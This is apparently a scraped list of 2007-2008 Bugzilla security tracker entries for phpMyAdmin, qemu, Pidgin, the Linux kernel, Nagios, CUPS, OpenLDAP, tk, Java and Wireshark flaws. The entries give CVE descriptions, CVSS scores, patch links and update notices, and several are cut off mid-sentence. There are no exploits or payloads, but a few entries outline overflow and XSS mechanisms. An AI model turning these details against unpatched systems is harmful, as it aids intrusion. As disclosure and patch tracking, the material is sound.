CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
bugzilla·2008-10-29·CVSS 6.8
CVE-2008-4775 [MEDIUM] CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
CVE-2008-4775 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4775 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin
3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when
register_globals is enabled, allows remote attackers to inject
arbitrary web script or HTML via the db parameter, a different vector
than CVE-2006-6942 and CVE-2007-5977.
References:
http://www.securityfocus.com/archive/1/archive/1/497815/100/0/threaded
http://www.securityfocus.com/bid/31928
http://secunia.com/advisories/32449
Discussion:
613 (phpMyAdmin): Build on target fedora-4-epel succeeded.
612 (phpMyAdmin): Build on target fedora-5-epel suc
Bugzilla
CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
bugzilla·2008-10-14·CVSS 7.2
CVE-2008-4539 [HIGH] CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
CVE-2008-4539 kvm/qemu/xen: Incomplete upstream fix for CVE-2007-1320
Created attachment 320281
Proposed actualized upstream qemu patch to resolve the Cirrus LGD-54XX "bitblt" heap overflow (CVE-2007-1320)
Jan Niehusmann discovered that the upstream fix for the CVE-2007-1320 is
incomplete and still allows local users to cause a heap-based buffer overflow,
when connecting via the VNC console.
Steps to reproduce:
No reproducer.
Upstream qemu patch for the initial CVE-2007-1320 issue:
https://svn.pardus.org.tr/pardus/2007/applications/emulators/qemu/files/CVE-2007-1320.patch
Proposed upstream correction of this patch - see attachment.
Discussion:
QEMU upstream commit:
http://git.kernel.dk/?p=qemu.git;a=commitdiff;h=65d35a09979e63541afc5bfc595b9f1b1b4ae069
More on current status of thi
Bugzilla
CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
bugzilla·2008-07-02·CVSS 6.4
CVE-2008-2957 [MEDIUM] CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
CVE-2008-2957 pidgin: unrestricted download of arbitrary files triggered via UPnP
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2957 to the following vulnerability:
The UPnP functionality in Pidgin 2.0.0, and possibly other versions,
allows remote attackers to trigger the download of arbitrary files and
cause a denial of service (memory or disk consumption) via a UDP
packet that specifies an arbitrary URL.
Proposed patch in CRISP Advisory 2007-01:
http://crisp.cs.du.edu/crisp-files/pidgin-2.0.0-upnp-limit-download.diff
References:
http://crisp.cs.du.edu/?q=ca2007-1
http://www.securityfocus.com/bid/29985
http://www.openwall.com/lists/oss-security/2008/06/27/3
Discussion:
Upstream advisory:
http://www.pidgin.im/news/security/?id=27
Fixed upstream in: 2.5.0
Bugzilla
CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
bugzilla·2008-06-27·CVSS 7.2
CVE-2007-5966 [HIGH] CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
CVE-2007-5966 kernel: non-root can trigger cpu_idle soft lockup
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5966 to the following vulnerability:
Integer overflow in the hrtimer_start function in kernel/hrtimer.c in the Linux kernel before 2.6.23.10 allows local users to execute arbitrary code or cause a denial of service (panic) via a large relative timeout value. NOTE: some of these details are obtained from third party information.
References:
http://www.securityfocus.com/archive/1/archive/1/485282/100/0/threaded
http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.23.10
https://issues.rpath.com/browse/RPL-2038
http://www.debian.org/security/2007/dsa-1436
http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00002.html
http://www.ubuntu.com/usn/usn-57
Bugzilla
CVE-2007-5803 nagios: XSS vulnerability
bugzilla·2008-05-14·CVSS 4.3
CVE-2007-5803 [MEDIUM] CVE-2007-5803 nagios: XSS vulnerability
CVE-2007-5803 nagios: XSS vulnerability
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5803 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in Nagios allows remote
attackers to inject arbitrary web script or HTML via unknown vectors,
a different vulnerability than CVE-2007-5624 and CVE-2008-1360.
References:
http://lists.opensuse.org/opensuse-security-announce/2008-05/msg00000.html
http://secunia.com/advisories/30202
Note:
This was reported as an incomplete fix for CVE-2007-5624.
Discussion:
Created attachment 305354
SuSE patch
This is *NOT* fixed in the upstream version 2.11.
(Extracted from SuSE nagios-2.9-48.4.src.rpm)
---
Now fixed upstream in 3.0.2 and 2.12:
http://www.nagios.org/development/history/nagios-3x.php
http://www.nag
Bugzilla
CVE-2008-1373 cups: overflow in gif image filter
bugzilla·2008-03-20·CVSS 2.6
CVE-2008-1373 [LOW] CVE-2008-1373 cups: overflow in gif image filter
CVE-2008-1373 cups: overflow in gif image filter
It was discovered that the GIF parsing code used by the CUPS printing system is affected
by a similar issue as the GIF parsers used by gd / netpbm / tk / SDL_image.
The value of code_size read from a GIF image is not properly validated before being
used to initialize the table array in gif_read_lzw(), causing a static buffer overflow.
Issue is similar to:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0553 (tk), CVE-2008-0554
(netpbm)
Discussion:
Created attachment 298680
Proposed patch
Similar to the fix used in gd / tk / netpbm / SDL_image.
---
Tracked upstream via: http://www.cups.org/str.php?L2765
---
cups-1.2.12-10.fc7 has been submitted as an update for Fedora 7
---
cups-1.3.6-4.fc8 has been pushed to the Fedora 8 stable repository. If probl
Bugzilla
CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
bugzilla·2008-02-08·CVSS 4.0
CVE-2008-0658 [MEDIUM] CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
CVE-2008-0658 openldap: slapd crash on modrdn operation with NOOP control on entry in bdb storage
While preparing the patch for CVE-2007-6698 (an issue allowing a slapd daemon crash
using modify requests with NOOP control, tracked via bug #431203), it was
discovered that a similar crash can be achieved using a modrdn operation with NOOP
control.
Upstream bug report:
http://www.openldap.org/its/index.cgi/Software%20Bugs?id=5358
Patch applied in upstream CVS:
http://www.openldap.org/devel/cvsweb.cgi/servers/slapd/back-bdb/modrdn.c.diff?r1=1.197&r2=1.198&f=h
Discussion:
Similar to CVE-2007-6698, this issue does not affect OpenLDAP packages as
shipped in Red Hat Enterprise Linux 2.1 and 3, as they do not support NOOP
controls. Packages shipped in Red Hat Enterprise Linux 4 and 5 are affected.
Bugzilla
CVE-2008-0553 tk: GIF handling buffer overflow
bugzilla·2008-02-05·CVSS 2.6
CVE-2008-0553 [LOW] CVE-2008-0553 tk: GIF handling buffer overflow
CVE-2008-0553 tk: GIF handling buffer overflow
The tk GIF handling code is based on the same code as used by gd and SDL_image and
is affected by the overflow known as CVE-2006-4484 and CVE-2007-6697.
The ReadImage function in tkImgGIF.c does not properly check the initialCodeSize
value read from a GIF image before using it as the upper bound during
the initialization of the append array. This can result in a stack buffer overflow.
Upstream fix:
http://tktoolkit.cvs.sourceforge.net/tktoolkit/tk/generic/tkImgGIF.c?r1=1.40&r2=1.41
This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses an embedded copy of the tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Bugzilla
CVE-2008-0628 java-1.6.0 default external entity processing
bugzilla·2008-02-04·CVSS 3.5
CVE-2008-0628 [LOW] CVE-2008-0628 java-1.6.0 default external entity processing
CVE-2008-0628 java-1.6.0 default external entity processing
Sun describes a 1.6.0-only (1.4, 1.5 not affected) XML processing vulnerability
(insecure default) at
http://sunsolve.sun.com/search/document.do?assetkey=1-66-231246-1.
This bug may cause effects similar to CVE-2007-5461.
Vendor Description:
The Java Runtime Environment (JRE) by default allows external entity references
to be processed. To turn off processing of external entity references, sites can
set the "external general entities" property to FALSE. This property is provided
since it may be possible to leverage the processing of external entity
references to access certain URL resources (such as some files and web pages) or
create a Denial of Service (DoS) condition on the system running the JRE. A
defect in the JRE allows
Bugzilla
CVE-2007-6441 wireshark WiMAX dissector possible crash
bugzilla·2008-01-02·CVSS 3.3
CVE-2007-6441 [LOW] CVE-2007-6441 wireshark WiMAX dissector possible crash
CVE-2007-6441 wireshark WiMAX dissector possible crash
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6441 to the following vulnerability:
The WiMAX dissector in Wireshark (formerly Ethereal) 0.99.6 allows remote attackers to cause a denial of service (crash) via unknown vectors related to "unaligned access on some platforms."
References:
http://www.wireshark.org/security/wnpa-sec-2007-03.html
Discussion:
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Bugzilla
CVE-2007-6119 wireshark DCP ETSI dissector flaws
bugzilla·2007-11-23·CVSS 7.8
CVE-2007-6119 [HIGH] CVE-2007-6119 wireshark DCP ETSI dissector flaws
CVE-2007-6119 wireshark DCP ETSI dissector flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6119 to the following vulnerability:
The DCP ETSI dissector in Wireshark (formerly Ethereal) 0.99.6 allows
remote attackers to cause a denial of service (long loop and resource
consumption) via unknown vectors.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Fedora:
https://admin.fedoraproject.org/updates/F
Bugzilla
CVE-2007-6121 wireshark RPC Portmap flaws
bugzilla·2007-11-23·CVSS 5.0
CVE-2007-6121 [MEDIUM] CVE-2007-6121 wireshark RPC Portmap flaws
CVE-2007-6121 wireshark RPC Portmap flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6121 to the following vulnerability:
Wireshark (formerly Ethereal) 0.8.16 to 0.99.6 allows remote attackers
to cause a denial of service (crash) via a malformed RPC Portmap
packet.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
http://rhn.redhat.com/errata/RHSA-2008-0059.html
Fedora:
https://admin.fedoraproject.o
Bugzilla
CVE-2007-6112 wireshark ppp flaws
bugzilla·2007-11-23·CVSS 10.0
CVE-2007-6112 [CRITICAL] CVE-2007-6112 wireshark ppp flaws
CVE-2007-6112 wireshark ppp flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6112 to the following vulnerability:
Buffer overflow in the PPP dissector Wireshark (formerly Ethereal)
0.99.6 allows remote attackers to cause a denial of service (crash)
and possibly execute arbitrary code via unknown vectors.
Discussion:
wireshark-0.99.7-2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
---
wireshark-0.99.7-1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
---
This issue was addressed in:
Red Hat Enterprise Linux:
http://rhn.redhat.com/errata/RHSA-2008-0058.html
Fedora:
https://admin.fedoraproject.org/update
Bugzilla
CVE-2006-4538 kernel: Local DoS with corrupted ELF
bugzilla·2007-09-13·CVSS 4.9
CVE-2006-4538 [MEDIUM] CVE-2006-4538 kernel: Local DoS with corrupted ELF
CVE-2006-4538 kernel: Local DoS with corrupted ELF
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for
EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of
service via a malformed ELF file and then triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in the following products:
Red Hat Enterprise Linux 2.1
Red Hat Enterprise Linux 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
2007-04-12
Published